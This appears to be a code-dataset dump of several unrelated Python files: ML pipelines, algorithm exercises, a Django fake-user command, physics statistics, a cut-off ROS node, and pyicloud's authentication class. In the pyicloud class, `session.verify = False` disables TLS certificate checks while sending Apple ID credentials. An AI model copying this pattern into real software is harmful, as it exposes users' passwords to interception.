np\n\nfrom meddlr.data.build import _limit_data_by_group, get_recon_dataset_dicts\nfrom meddlr.data.catalog import DatasetCatalog\n\n\ndef test_filter_by_metadata():\n dataset = \"fastMRI_knee_multicoil_v0.0.1_train\"\n dataset_dicts = get_recon_dataset_dicts([dataset], filter_by=((\"flipAngle_deg\", 140),))\n\n assert len(dataset_dicts) > 0\n assert all(dd[\"_metadata\"][\"flipAngle_deg\"] == 140 for dd in dataset_dicts)\n\n\ndef test_num_scans_total():\n dataset = \"fastMRI_knee_multicoil_v0.0.1_val\"\n orig_dataset_dicts = DatasetCatalog.get(dataset)\n\n dataset_dicts = get_recon_dataset_dicts([dataset], num_scans_total=10)\n assert len(dataset_dicts) == 10\n\n values = {140: 10}\n dataset_dicts = get_recon_dataset_dicts([dataset], num_scans_total=((\"flipAngle_deg\", values),))\n orig_flip_angles_to_count = {\n k: v\n for k, v in zip(\n *np.unique(\n [dd[\"_metadata\"][\"flipAngle_deg\"] for dd in orig_dataset_dicts], return_counts=True\n )\n )\n }\n flip_angles_to_count = {\n k: v\n for k, v in zip(\n *np.unique(\n [dd[\"_metadata\"][\"flipAngle_deg\"] for dd in dataset_dicts], return_counts=True\n )\n )\n }\n for k in sorted(orig_flip_angles_to_count.keys()):\n if k in values:\n assert flip_angles_to_count[k] <= values[k]\n else:\n assert flip_angles_to_count[k] == orig_flip_angles_to_count[k]\n\n\ndef test_limit_data_by_group():\n dataset_dicts = [\n {\"id\": 1, \"metadata_A\": \"A1\", \"metadata_B\": \"B1\"},\n {\"id\": 2, \"metadata_A\": \"A1\", \"metadata_B\": \"B2\"},\n {\"id\": 3, \"metadata_A\": \"A1\", \"metadata_B\": \"B3\"},\n {\"id\": 4, \"metadata_A\": \"A1\", \"metadata_B\": \"B1\"},\n {\"id\": 5, \"metadata_A\": \"A2\", \"metadata_B\": \"B2\"},\n {\"id\": 6, \"metadata_A\": \"A2\", \"metadata_B\": \"B3\"},\n {\"id\": 7, \"metadata_A\": \"A3\", \"metadata_B\": \"B1\"},\n {\"id\": 8, \"metadata_A\": \"A3\", \"metadata_B\": \"B2\"},\n {\"id\": 9, \"metadata_A\": \"A3\", \"metadata_B\": \"B3\"},\n {\"id\": 10, \"metadata_A\": \"A4\", \"metadata_B\": \"B1\"},\n {\"id\": 11, \"metadata_A\": \"A4\", \"metadata_B\": \"B2\"},\n {\"id\": 12, \"metadata_A\": \"A5\", \"metadata_B\": \"B3\"},\n ]\n\n out = _limit_data_by_group(dataset_dicts, num_scans_total=((\"metadata_A\", {\"A1\": 2, \"A2\": 1}),))\n out_ids = [o[\"id\"] for o in out]\n assert out_ids == [1, 2, 5, 7, 8, 9, 10, 11, 12]\n\n out = _limit_data_by_group(dataset_dicts, num_scans_total=((\"metadata_A\", (\"A1\", 2, \"A2\", 1)),))\n out_ids = [o[\"id\"] for o in out]\n assert out_ids == [1, 2, 5, 7, 8, 9, 10, 11, 12]\n\n out = _limit_data_by_group(\n dataset_dicts, num_scans_total=((\"metadata_A\", {(\"A1\", \"A2\"): 5, \"A3\": 2}),)\n )\n out_ids = [o[\"id\"] for o in out]\n assert out_ids == [1, 2, 3, 4, 5, 7, 8, 10, 11, 12]\n","repo_name":"ad12/meddlr","sub_path":"tests/data/test_build.py","file_name":"test_build.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"2"} +{"seq_id":"38618108433","text":"from itertools import islice\n\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth import hashers\nfrom django.core.management.base import BaseCommand\n\nfrom faker import Faker\n\n\nUser = get_user_model()\nfake = Faker()\n\n\nclass Command(BaseCommand):\n help = 'Create random users'\n\n def add_arguments(self, parser):\n parser.add_argument('total', type=int, choices=range(1, 11), help='Indicates the number of users to be created')\n\n def handle(self, **kwargs):\n total = kwargs['total']\n objs = (User(username=fake.name(), email=fake.ascii_email(),\n password=hashers.make_password(str(fake.password()))) for i in range(total))\n while True:\n batch = list(islice(objs, total))\n if not batch:\n break\n User.objects.bulk_create(batch, total)\n\n # for i in range(total):\n # User.objects.create(username=fake.name(), email=fake.ascii_email(), password=fake.password())\n","repo_name":"Archibay/Django_hw_1","sub_path":"catalog/management/commands/create_users.py","file_name":"create_users.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"74038841645","text":"from collections import deque\r\ndef draw(n,m):\r\n graph = [[]*(n+1) for _ in range(n+1)]\r\n for i in range(m):\r\n a,b = map(int,input().split())\r\n graph[a].append(b)\r\n graph[b].append(a)\r\n return graph\r\ndef bfs(n,target1,target2,graph):\r\n q = deque([(target1,0)])\r\n visited = [False]*(n+1)\r\n visited[target1] = True\r\n\r\n while q:\r\n cur, chonsu = q.popleft()\r\n if cur == target2:\r\n return chonsu\r\n for next in graph[cur]:\r\n if not visited[next]:\r\n q.append((next,chonsu+1))\r\n visited[cur] = True\r\n chonsu = -1\r\n return chonsu\r\n\r\nn = int(input())\r\ntarget1,target2 = map(int,input().split())\r\nm = int(input())\r\ngraph = draw(n,m)\r\nchonsu = bfs(n,target1,target2,graph)\r\nprint(chonsu)\r\n","repo_name":"happyyeon/my_algorithm","sub_path":"백준/Silver/2644. 촌수계산/촌수계산.py","file_name":"촌수계산.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"17481632591","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split #数据集划分\nfrom sklearn.ensemble import RandomForestClassifier # ��机森林\nfrom sklearn.metrics import confusion_matrix, classification_report #报告\nfrom sklearn.tree import DecisionTreeClassifier #决策树\nfrom sklearn.linear_model import LogisticRegression #逻辑回归\nfrom sklearn.metrics import accuracy_score #精确度\n\ndef cal_is_agree(x): # x 为每个用户的三个月值\n # 如果三个月不全为1,用第三个月值减去前两个月均值;三个月的值都为1,取值为1.5。\n # 所有取值情况为-1、-0.5、0、0.5、1、1.5\n x = np.array(x)\n if x.sum() == 3:\n return 1.5\n else:\n return x[2] - x[:2].mean()\n\ndata = pd.read_csv(\"USER_INFO_M.csv\", encoding='gbk')\ndata.drop_duplicates(inplace=True) # 数据去重\ndata.drop(['MANU_NAME', 'MODEL_NAME', 'OS_DESC', 'CONSTELLATION_DESC'], axis=1, inplace=True)\ncleardata = data;\ndata_group = cleardata.groupby('USER_ID') # 分组\n\n\nlabel = data_group[['USER_ID', 'IS_LOST']].tail(1) # 取用户id、标记(每组的最后一个值)\nlabel.set_index('USER_ID', inplace=True) # 将“USER_ID”设为索引\nlabel = data_group[['USER_ID', 'IS_LOST']].tail(1) # 取用户id、标记(每组的最后一个值)\nlabel.set_index('USER_ID', inplace=True) # 将“USER_ID”设为索引\n\ndata_1 = data_group[['CUST_SEX', 'CERT_AGE', 'TERM_TYPE']].first() \ndata_2 = data_group['INNET_MONTH'].last()\ndata_3 = pd.DataFrame(data_group['IS_AGREE'].agg(cal_is_agree))#agg是一个聚合函数,聚合函数操作始终是在轴(默认是列轴,也可设置行轴)上执行,\ndate = data_group['AGREE_EXP_DATE'].last() # 取第3个月的\"合约计划到期时长\"\nnum_mon = (pd.to_datetime(date, format='%Y%m') - pd.to_datetime('2016-03')).dt.days/30 # 时长以“月”为单位\ndata_4 = pd.DataFrame(num_mon).fillna(-1) #用-1填充缺失值\ndata_5 = pd.DataFrame(data_group['CREDIT_LEVEL'].agg('mean')) # 信用等级\n# 3.7 VIP等级\ndata_6 = data_group['VIP_LVL'].last().fillna(0) # 取最后一个值\n# 3.8 本月费用(取三个月的平均值)特征构建\ndata_7 = pd.DataFrame(data_group['ACCT_FEE'].mean())\n# 3.9 平均每次通话时长\n# 总通话\ndata_8_1 = pd.DataFrame(data_group['CALL_DURA'].sum()/data_group['CDR_NUM'].sum(),\n columns=['Total_mean'])\n# 本地通话\ndata_8_2 = pd.DataFrame(data_group['NO_ROAM_LOCAL_CALL_DURA'].sum()/data_group['NO_ROAM_LOCAL_CDR_NUM'].sum(),\n columns=['Local_mean'])\n# 国内长途通话\ndata_8_3 = pd.DataFrame(data_group['NO_ROAM_GN_LONG_CALL_DURA'].sum() / data_group['NO_ROAM_GN_LONG_CDR_NUM'].sum(),\n columns=['GN_Long_mean'])\n# 国内漫游通话\ndata_8_4 = pd.DataFrame(data_group['GN_ROAM_CALL_DURA'].sum() / data_group['GN_ROAM_CDR_NUM'].sum(),\n columns=['GN_Roam_mean'])\n# 数据拼接\ndata_8 = pd.concat([data_8_1, data_8_2, data_8_3, data_8_4], axis=1).fillna(0)\n# 3.10 其他变量\n# 非漫游通话次数(次)、短信发送数(条)、上网流量(MB)、本地非漫游上网流量(MB)、国内漫游上网流量(MB)、\n# 有通话天数、有主叫天数、有被叫天数 (主叫 + 被叫 ≠ 总通话)\n# 语音呼叫圈、主叫呼叫圈、被叫呼叫圈\ndata_9 = data_group[['NO_ROAM_CDR_NUM', 'P2P_SMS_CNT_UP', 'TOTAL_FLUX', 'LOCAL_FLUX','GN_ROAM_FLUX',\n 'CALL_DAYS', 'CALLING_DAYS', 'CALLED_DAYS',\n 'CALL_RING','CALLING_RING', 'CALLED_RING']].agg('mean')\n\n\n# 对所有特征&标签按索引重新排序,以保证数据拼接时索引一致\nlabel.sort_index(inplace=True)\ndata_1.sort_index(inplace=True)\ndata_2.sort_index(inplace=True)\ndata_3.sort_index(inplace=True)\ndata_4.sort_index(inplace=True)\ndata_5.sort_index(inplace=True)\ndata_6.sort_index(inplace=True)\ndata_7.sort_index(inplace=True)\ndata_8.sort_index(inplace=True)\ndata_9.sort_index(inplace=True)\n# 拼接所有特征&标记\ndata_new = pd.concat([data_1, data_2, data_3, data_4,\n data_5, data_6, data_7, data_8, data_9, label], axis=1)\nprint(data_new.head() )\n\n#缺失值处理\nprint(\"6 isnull \\n\",data_new.isnull().sum()) # 查看缺失值\ndata_new = data_new.fillna(method='ffill').fillna(method='bfill') # 近邻值填充(向下填充+向上填充)\n\ndata_new.to_csv('clear_data.csv', index=True, encoding='utf-8-sig')\ndata = pd.read_csv('clear_data.csv', index_col=0)\ncorr = data.corr() # 皮尔逊相关系数 矩阵\n# 以0.08作为筛选阈值\nfeature_index = corr['IS_LOST'].drop('IS_LOST').abs() > 0.08 # 取出与\"标记\"的相关系数\nfeature_name = feature_index.loc[feature_index].index # 选出的重要特征名\n\n# 提取特征与标记\nX = data.loc[:, feature_name] # 样本自变量\ny = data.loc[:, 'IS_LOST'] # 样本目标变量\n# 样本不平衡 \ny.value_counts()\n\nindex_positive = y.index[y == 1] # 正样本的索引\nindex_negative = np.random.choice(a=y.index[y == 0].tolist(), size=y.value_counts()[1]) # 负样本的索引,对负样本进行下采样操作\n\nX_positive = X.loc[index_positive, :] # 正样本自变量\nX_negative = X.loc[index_negative, :] # 负样本自变量\n\ny_positive = y.loc[index_positive] # 正样本标签\ny_negative = y.loc[index_negative] # 负样本标签\n\nX = pd.concat([X_positive, X_negative], axis=0) # 处理后的正样本\ny = pd.concat([y_positive, y_negative], axis=0) # 处理后的负样本\n\n\n\n##################################\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, stratify=y) # 数据划分\n\nrfc = RandomForestClassifier() # 初始化随机森林模型\nrfc.fit(X_train, y_train) # 模型训练\ny_pre = rfc.predict(X_test) # 调用模型对测试样本进行预测\nprint(classification_report(y_test, y_pre)) # 打印分类报告(包含了各模型性能评价指标)\nrfc_acc = round(accuracy_score(y_pre,y_test)*100,2)\nprint(f\"logistic accuracy is: {rfc_acc}%\")\n\n######\n# 创建决策树模型\ndtc = DecisionTreeClassifier()\n# 训练模型\ndtc.fit(X_train,y_train)\n# 预测训练集和测试集结果\ndtc_pred = dtc.predict(X_test)\n# 计算精确度\ndtc_acc = round(accuracy_score(dtc_pred,y_test)*100,2)\nprint(f\"decision tree accuracy is: {dtc_acc}%\")\n\n######\n# 创建逻辑回归模型\nlr = LogisticRegression()\n# 训练模型\nlr.fit(X_train,y_train)\n# 预测训练集和测试集结果\nlr_pred = lr.predict(X_test)\n# 计算精确度\nlr_acc = round(accuracy_score(lr_pred,y_test)*100,2)\nprint(f\"logistic accuracy is: {lr_acc}%\")\n\n\nprint(\"the best acc is :\" ,(max(lr_acc,dtc_acc,rfc_acc)),\"%\")\n","repo_name":"GroganZY/Machine-Learning-laboratory","sub_path":"课设/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":6726,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"16699913113","text":"# NA , Medium\n\n\n# Optimal\n# T.C. - O(n)\n# S.C - O(n)\n\n\n# Algorithm\n\n\nclass Node:\n def __init__(self, val=-1, left=None, right=None) -> None:\n self.val = val\n self.left = left\n self.right = right\n\n\ndef allTraversal(root):\n pre, ino, post = [], [], []\n stack = [[root, 1]]\n\n while stack:\n node, num = stack.pop(-1)\n\n if num == 1:\n # Go to pre-order final list\n pre.append(node.val)\n\n # Insert with ++\n stack.append([node, num + 1])\n\n # go to left\n if node.left:\n stack.append([node.left, 1])\n\n elif num == 2:\n # Go to in-order final list\n ino.append(node.val)\n\n # Insert with ++\n stack.append([node, num + 1])\n\n # go to right\n if node.right:\n stack.append([node.right, 1])\n else:\n # Go to in-order final list\n post.append(node.val)\n\n print(pre)\n print(ino)\n print(post)\n\n\n# 3\n# / \\\n# 5 1\n# / \\ / \\\n# 6 2 0 8\n\n\nroot = Node(3)\nroot.left = Node(5)\nroot.right = Node(1)\nroot.right.right = Node(8)\nroot.right.left = Node(0)\nroot.left.right = Node(2)\nroot.left.left = Node(6)\n\nallTraversal(root)\n","repo_name":"glowfi/DS","sub_path":"Programs/7_Trees/4_All_traversal_in_one_pass.py","file_name":"4_All_traversal_in_one_pass.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"36555448713","text":"import time\nimport uuid\nimport hashlib\nimport json\nimport requests\n\nfrom exceptions import PyiCloudFailedLoginException\nfrom services import (\n FindMyiPhoneServiceManager,\n CalendarService,\n UbiquityService,\n ContactsService,\n)\n\n\nclass PyiCloudService(object):\n \"\"\"\n A base authentication class for the iCloud service. Handles the\n validation and authentication required to access iCloud services.\n\n Usage:\n from pyicloud import PyiCloudService\n pyicloud = PyiCloudService('username@apple.com', 'password')\n pyicloud.iphone.location()\n \"\"\"\n def __init__(self, apple_id, password):\n self.discovery = None\n self.client_id = str(uuid.uuid1()).upper()\n self.user = {'apple_id': apple_id, 'password': password}\n\n self._home_endpoint = 'https://www.icloud.com'\n self._setup_endpoint = 'https://p12-setup.icloud.com/setup/ws/1'\n self._push_endpoint = 'https://p12-pushws.icloud.com'\n\n self._base_login_url = '%s/login' % self._setup_endpoint\n self._base_validate_url = '%s/validate' % self._setup_endpoint\n self._base_system_url = '%s/system/version.json' % self._home_endpoint\n self._base_webauth_url = '%s/refreshWebAuth' % self._push_endpoint\n\n self.session = requests.Session()\n self.session.verify = False\n self.session.headers.update({\n 'host': 'setup.icloud.com',\n 'origin': self._home_endpoint,\n 'referer': '%s/' % self._home_endpoint,\n 'User-Agent': 'Opera/9.52 (X11; Linux i686; U; en)'\n })\n\n self.params = {}\n\n self.authenticate()\n\n def refresh_validate(self):\n \"\"\"\n Queries the /validate endpoint and fetches two key values we need:\n 1. \"dsInfo\" is a nested object which contains the \"dsid\" integer.\n This object doesn't exist until *after* the login has taken place,\n the first request will compain about a X-APPLE-WEBAUTH-TOKEN cookie\n 2. \"instance\" is an int which is used to build the \"id\" query string.\n This is, pseudo: sha1(email + \"instance\") to uppercase.\n \"\"\"\n req = self.session.get(self._base_validate_url, params=self.params)\n resp = req.json()\n if 'dsInfo' in resp:\n dsid = resp['dsInfo']['dsid']\n self.params.update({'dsid': dsid})\n instance = resp.get('instance', uuid.uuid4().hex)\n sha = hashlib.sha1(self.user.get('apple_id') + instance)\n self.params.update({'id': sha.hexdigest().upper()})\n\n def authenticate(self):\n \"\"\"\n Handles the full authentication steps, validating,\n authenticating and then validating again.\n \"\"\"\n self.refresh_validate()\n\n data = dict(self.user)\n data.update({'id': self.params['id'], 'extended_login': False})\n req = self.session.post(\n self._base_login_url,\n params=self.params,\n data=json.dumps(data)\n )\n\n if not req.ok:\n msg = 'Invalid email/password combination.'\n raise PyiCloudFailedLoginException(msg)\n\n self.refresh_validate()\n\n self.discovery = req.json()\n self.webservices = self.discovery['webservices']\n\n @property\n def devices(self):\n \"\"\" Return all devices.\"\"\"\n service_root = self.webservices['findme']['url']\n return FindMyiPhoneServiceManager(\n service_root,\n self.session,\n self.params\n )\n\n @property\n def iphone(self):\n return self.devices[0]\n\n @property\n def files(self):\n if not hasattr(self, '_files'):\n service_root = self.webservices['ubiquity']['url']\n self._files = UbiquityService(service_root, self.session, self.params)\n return self._files\n\n @property\n def calendar(self):\n service_root = self.webservices['calendar']['url']\n return CalendarService(service_root, self.session, self.params)\n \n @property\n def contacts(self):\n service_root = self.webservices['contacts']['url']\n return ContactsService(service_root, self.session, self.params)\n\n def __unicode__(self):\n return u'iCloud API: %s' % self.user.get('apple_id')\n\n def __str__(self):\n return unicode(self).encode('ascii', 'ignore')\n\n def __repr__(self):\n return '<%s>' % str(self)\n","repo_name":"angels101/practice-django-framework-api-","sub_path":"env/lib/python3.8/site-packages/pyicloud/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"72566007407","text":"\"\"\"\nTools and methods for detection of fluourescence in the ion trap. The\ndistributions are available as `dark_pmf()` and `light_pmf()`,\nand the measurement estimators are available as `threshold_estimator()` and\n`maximum_likelihood_estimator()`. The biased method of thresholding (i.e. the\nnaive count of how many points are below a threshold) is available as\n`biased_threshold_estimator()`.\n\"\"\"\n\nimport warnings\nimport numpy as np\nfrom scipy.special import gammaincc, erfc, erf, xlogy\n\ndef _integrate(dx, f):\n \"\"\"\n Numerically integrate a function which is closed on both ends.\n \"\"\"\n coefficients = np.ones(f.size, dtype=np.float64)\n coefficients[:3] = [3/8, 7/6, 23/24]\n coefficients[-3:] = [23/24, 7/6, 3/8]\n return dx * coefficients.dot(f)\n\ndef poisson_pmf(mean, ns):\n \"\"\"\n Calculate the probability mass function of the Poisson distribution of a\n given mean for all the possible values of `n` up to `ns - 1` (i.e. the\n output array has size `ns`).\n\n Arguments --\n mean: float >= 0 -- The mean of the distribution (also called lambda).\n ns: int > 0 -- The number of `ns` to calculate the distribution for.\n\n Returns --\n np.array(dtype=np.float64, shape=(ns,)) --\n The values of the PMF, such that `poisson_pmf(mean, ns)[n] == pmf[n]`.\n \"\"\"\n out = np.empty(ns, dtype=np.float64)\n out[0] = np.exp(-mean)\n for n in range(1, ns):\n out[n] = out[n - 1] * (mean / n)\n return out\n\ndef dark_pmf(dark_rate, detect_time, ns):\n \"\"\"\n Calculate the probability mass function of the distribution of the count\n rates of a dark ion.\n\n This is just a Poisson distribution of mean `dark_rate * detect_time`.\n\n Arguments --\n dark_rate: float in Hz >= 0 -- The photon emission rate for the dark state.\n detect_time: float in s >= 0 -- The time to detect for.\n ns: int > 0 -- The number of `ns` to calculate the distribution for.\n\n Returns --\n np.array(dtype=np.float64, shape=(ns,)) --\n The values of the PMF, such that `dark_pmf(mean, ns)[n] == pmf[n]`.\n \"\"\"\n return poisson_pmf(dark_rate * detect_time, ns)\n\ndef light_pmf(dark_rate, light_rate, j_mix_decay, detect_time, ns):\n \"\"\"\n Calculate the probability mass function of the distribution of the count\n rates of a light ion.\n\n This is a combination of a Poisson distribution, and the j-mixing tail.\n\n Arguments --\n dark_rate: float in Hz >= 0 -- The photon emission rate of the dark state.\n light_rate: float in Hz >= 0 -- The photon emission rate of the light state.\n j_mix_decay: float in s >= 0 -- The time constant of the j-mixing decay.\n detect_time: float in s >= 0 -- The time to detect for.\n ns: int > 0 -- The number of `ns` to calculate the distribution for.\n\n Returns --\n np.array(dtype=np.float64, shape=(ns,)) --\n The values of the PMF, such that `light_pmf(mean, ns)[n] == pmf[n]`.\n \"\"\"\n z_scale = 1 + 1 / (light_rate * j_mix_decay)\n dark_z = dark_rate * detect_time * z_scale\n light_z = (light_rate + dark_rate) * detect_time * z_scale\n recip_r = light_rate * j_mix_decay / (light_rate * j_mix_decay + 1)\n ratio = recip_r * np.exp(dark_rate*detect_time / (light_rate*j_mix_decay))\\\n / (light_rate * j_mix_decay)\n j_mix = np.empty(ns, dtype=np.float64)\n for n in range(ns):\n j_mix[n] = ratio * (gammaincc(n+1, dark_z) - gammaincc(n+1, light_z))\n ratio *= recip_r\n poisson = poisson_pmf((dark_rate+light_rate) * detect_time, ns)\\\n * np.exp(-detect_time / j_mix_decay)\n return j_mix + poisson\n\ndef _index_ceil(needle, haystack, min=0, max=None):\n \"\"\"\n Find the first index in the `haystack` whose element is greater than or\n equal to `needle`. This saturates at the top, so if `needle` is greater\n than all the values in the `haystack`, then the returned index is\n `haystack.size - 1`.\n \"\"\"\n max = max if max is not None else haystack.shape[0] - 1\n mid = min + (max - min) // 2\n if mid == 0:\n # compare to 0 first to avoid accessing haystack[-1]\n return int(haystack[mid] < needle)\n elif mid == haystack.shape[0] - 2 and haystack[mid] < needle:\n # saturate at top - assume needle always lower than max value in\n # haystack. This might not be the case, but is the desired behaviour in\n # the case of truncation errors in the statistical distributions.\n return mid + 1\n elif haystack[mid] >= needle:\n if haystack[mid - 1] < needle:\n return mid\n else:\n return _index_ceil(needle, haystack, min=min, max=mid)\n else:\n return _index_ceil(needle, haystack, min=mid, max=max)\n\ndef sample(distribution, n_samples=1):\n cum_dist = np.cumsum(distribution)\n uniform = np.random.random_sample(n_samples)\n return np.array([_index_ceil(p, cum_dist) for p in uniform],\n dtype=np.int32)\n\ndef histogram(samples, n_max=None, scale=False):\n if n_max is None:\n n_max = int(np.max(samples))\n out = np.zeros(n_max + 1, dtype=np.int32)\n for s in samples:\n out[int(s)] += 1\n return out / samples.shape[0] if scale else out\n\ndef log_likelihood(counts, dark, light):\n light_zeros = light == 0\n dark_zeros = dark == 0\n all_light_impossible = np.any(counts[light_zeros])\n all_dark_impossible = np.any(counts[dark_zeros])\n def f(p):\n # we could have precalculated `diff = dark - light` so that this line is\n # `p * diff + light`, which is one fewer FLOP, but this lends itself to\n # greater FP errors when `p ~ 1`.\n probs = p * dark + (1 - p) * light\n fail = (p == 0 and all_light_impossible)\\\n or (p == 1 and all_dark_impossible)\\\n or np.any(counts[probs == 0])\n return np.sum(xlogy(counts, probs)) if not fail else -np.inf\n return f\n\ndef d_log_likelihood_0(counts, dark, light):\n if np.any(np.logical_and(counts, np.logical_not(light))):\n return np.inf\n mask = np.logical_or(counts, light)\n safes = np.sum(counts[mask] * dark[mask] / light[mask])\n unsafes = np.sum(dark[np.logical_not(mask)])\n return (safes + unsafes) / np.sum(counts) - 1\n\ndef d_log_likelihood_1(counts, dark, light):\n if np.any(np.logical_and(counts, np.logical_not(dark))):\n return -np.inf\n mask = np.logical_or(counts, dark)\n safes = np.sum(counts[mask] * light[mask] / dark[mask])\n unsafes = np.sum(light[np.logical_not(mask)])\n return 1 - (safes + unsafes) / np.sum(counts)\n\ndef _prepare_distributions(dark, light):\n dark = dark if abs(np.sum(dark) - 1) < 1e-8 else dark / np.sum(dark)\n light = light if abs(np.sum(light) - 1) < 1e-8 else light / np.sum(light)\n d_size = 1 + max((np.nonzero(dark)[0][-1], np.nonzero(light)[0][-1]))\n dark, light = [np.pad(x, ((0, max(d_size - x.size, 0)),),\n 'constant', constant_values=0)\n for x in [dark, light]]\n return dark[:d_size], light[:d_size]\n\ndef _crop_counts(counts, dark, light):\n out_of_range = np.sum(counts[dark.size:])\n if out_of_range != 0:\n wmsg = f\"{out_of_range} measurements are outside the range\"\\\n + \" of probabilities for the distributions. These points will\"\\\n + \" be omitted in calculations.\"\n warnings.warn(wmsg)\n size = min((dark.size, counts.size))\n return counts[:size], dark[:size], light[:size]\n\n# This is actually the golden ratio minus 1, but that's what's actually\n# important for the section search (and the ratio of the two sections is the\n# golden ratio).\n_golden_ratio = 0.5 * (np.sqrt(5) - 1)\ndef _bracket_maximum(f):\n \"\"\"\n Initially bracket the maximum, keeping the ratio of points equal. Only one\n of the `while` branches should be actually enterable, but while the `while`s\n operate like `if`s, there's no semantic `elwhile` statement.\n \"\"\"\n far, pivot, near = f(0.0), f(_golden_ratio), f(1.0)\n while pivot < far:\n near = pivot\n pivot = f((1 - _golden_ratio) * far[1] + _golden_ratio * pivot[1])\n while pivot < near:\n far = pivot\n pivot = f((1 - _golden_ratio) * pivot[1] + _golden_ratio * near[1])\n return far, pivot, near\n\ndef maximum_likelihood_estimator(dark, light, atol=1e-8):\n dark_0, light_0 = _prepare_distributions(dark, light)\n def p(counts):\n counts, dark, light = _crop_counts(counts, dark_0, light_0)\n f_inner = log_likelihood(counts, dark, light)\n f = lambda p: (f_inner(p), p)\n # clip to the relevant edge if the derivatives point away from [0, 1]\n if d_log_likelihood_0(counts, dark, light) <= 0.0:\n return 0.0\n elif d_log_likelihood_1(counts, dark, light) >= 0.0:\n return 1.0\n far, pivot, near = _bracket_maximum(f)\n while abs(near[1] - far[1]) > atol:\n new = f(far[1] + _golden_ratio * (pivot[1] - far[1]))\n if new > pivot:\n far, pivot, near = far, new, pivot\n else:\n far, pivot, near = near, pivot, new\n return pivot[1]\n return p\n\ndef maximum_likelihood_std(dark, light):\n dark, light = _prepare_distributions(dark, light)\n diff_sq = (dark - light) ** 2\n diff_sq_zeros = diff_sq == 0\n mask = np.logical_not(diff_sq_zeros)\n def std(p, n):\n scalar = np.isscalar(p) and np.isscalar(n)\n p, n = (np.array([p]), np.array([n])) if scalar\\\n else np.broadcast_arrays(p, n)\n # We define `0/0 == 0` here so that including additional bins beyond the\n # necessary ones does not change the Fisher information.\n var = np.zeros(p.shape, dtype=np.float64)\n bin_p = np.outer(p, dark) + np.outer(1 - p, light)\n out = np.all(np.logical_or(diff_sq_zeros, bin_p), axis=1)\n ps, ns = p[out], n[out]\n\n # Scaled variance and standard deviation of the unclipped estimators.\n # Except in one case, the quantities are always used as `2 * var` or\n # `sqrt(2) * std`, so this saves us a few vector operations.\n ma_bin_p = bin_p[np.outer(out, mask)].reshape(np.sum(out), np.sum(mask))\n fisher = np.sum(diff_sq[mask] / ma_bin_p, axis=1)\n var_p = 2 / (ns * fisher)\n std_p = np.sqrt(var_p)\n\n # Precalculate a whole bunch of quantities to save time.\n _1_p = 1 - ps\n g_1_p_sq = np.exp(- _1_p**2 / var_p)\n g_p_sq = np.exp(- ps**2 / var_p)\n recip_std_p = 1.0 / std_p\n erfc_1_p = erfc(_1_p * recip_std_p)\n erf_1_p = erf(_1_p * recip_std_p)\n erf_p = erf(ps * recip_std_p)\n recip_sqrt_pi = 1.0 / np.sqrt(np.pi)\n\n # Expectation of the unclipped estimator (perhaps unnecessary).\n exp_cp = 0.5 * ((g_p_sq - g_1_p_sq) * std_p * recip_sqrt_pi\n + ps * (erf_1_p + erf_p) + erfc_1_p)\n\n exp_p_sq = 0.5 * ((ps**2 + 0.5*var_p) * (erf_1_p + erf_p)\n + std_p * recip_sqrt_pi * (ps * g_p_sq\n - (ps + 1) * g_1_p_sq)\n + erfc_1_p)\n var[out] = exp_p_sq - exp_cp**2\n return np.sqrt(var) if not scalar else np.sqrt(var[0])\n return std\n\ndef biased_threshold_estimator(threshold):\n return lambda counts: np.sum(counts[:threshold]) / np.sum(counts)\n\ndef threshold_integral_std(dark, light, t):\n d = np.sum(dark[t:])\n l = np.sum(light[:t])\n scale = (1 - d - l)**2\n if scale < 1e-10:\n return np.inf\n scale = 0.125 / scale\n return scale * (2 * ((1 - 2*d) * np.sqrt(d*(1-d))\n + (1 - 2*l) * np.sqrt(l*(1-l)))\n + np.arcsin(1 - 2*l) + np.arcsin(1 - 2*d))\n\ndef best_threshold(dark, light):\n return np.argmin([threshold_integral_std(dark, light, t)\n for t in np.arange(min((dark.size, light.size)))])\n\ndef threshold_std(dark, light, t=None):\n if t is None:\n t = best_threshold(dark, light)\n l = np.sum(light[:t])\n fidelity = 1 - l - np.sum(dark[t:])\n if fidelity < 1e-8:\n # catch negative case too.\n return lambda p, n: np.full(np.broadcast(p, n).shape, np.inf)\n scale = 1.0 / fidelity\n c0, c1, c2 = [l * (1 - l),\n fidelity * (1 - 2 * l),\n -fidelity * fidelity]\n return lambda p, n: np.sqrt((c0 + p * (c1 + p * c2)) / (n - 1)) * scale\n\ndef threshold_estimator(dark, light):\n t = best_threshold(dark, light)\n l_error = np.sum(light[:t])\n scale = 1.0 / (1 - l_error - np.sum(dark[t:]))\n return lambda counts: (np.sum(counts[:t])/np.sum(counts) - l_error) * scale\n","repo_name":"iontrapimperial/penning_analysis","sub_path":"penning/data/detection.py","file_name":"detection.py","file_ext":"py","file_size_in_byte":12589,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"22485874560","text":"#!/usr/bin/env python3\n\nimport rospy\nfrom sensor_msgs.msg import LaserScan\nimport numpy as np\nfrom points2img import get_image\n\nclass LaserReader():\n \"\"\"\n Clase que lee y almacena la información del tópico /scan.\n \n \"\"\"\n def __init__(self):\n rospy.init_node(\"laser_reader\", anonymous=True)\n self.ranges = []\n self.intensities = []\n self.angles = []\n self.laser_sub = rospy.Subscriber(\"/scan\", LaserScan, self.laser_callback)\n self.angle_range = 57 * np.pi/180 # Por enunciado es el rango de grados\n self.resolution=0.01 # útil.\n self.zmax = 4\n\n def laser_callback(self, info):\n \"\"\" información del mensaje 